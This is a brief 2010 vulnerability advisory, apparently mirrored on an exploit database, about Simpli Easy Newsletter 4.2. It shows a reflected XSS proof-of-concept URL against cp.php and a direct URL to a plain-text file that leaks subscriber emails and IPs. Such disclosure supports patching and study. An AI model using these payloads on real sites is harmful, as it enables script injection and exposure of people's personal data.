Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage Date: 30.10.2010 Author: p0deje | http://p0deje.blogspot.com Software Link: http://scubadivingcalculators.com/simpli-easy-newsletter.php Version: <= 4.2 1. Cross-site Scripting Vulnerable code: cp.php ---------------- 6: <form name="txtlist" action="cp.php?do=<?=$_GET['do']?>" method="post"> Proof-of-concept: http://www.example.com/cp.php?do="><script>alert(1)</script> 2. Information Leakage By default, application saves subscribed email addresses and correspondent IP addresses to plain text file el.txt Proof-of-concept: http://www.example.com/el.txt
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论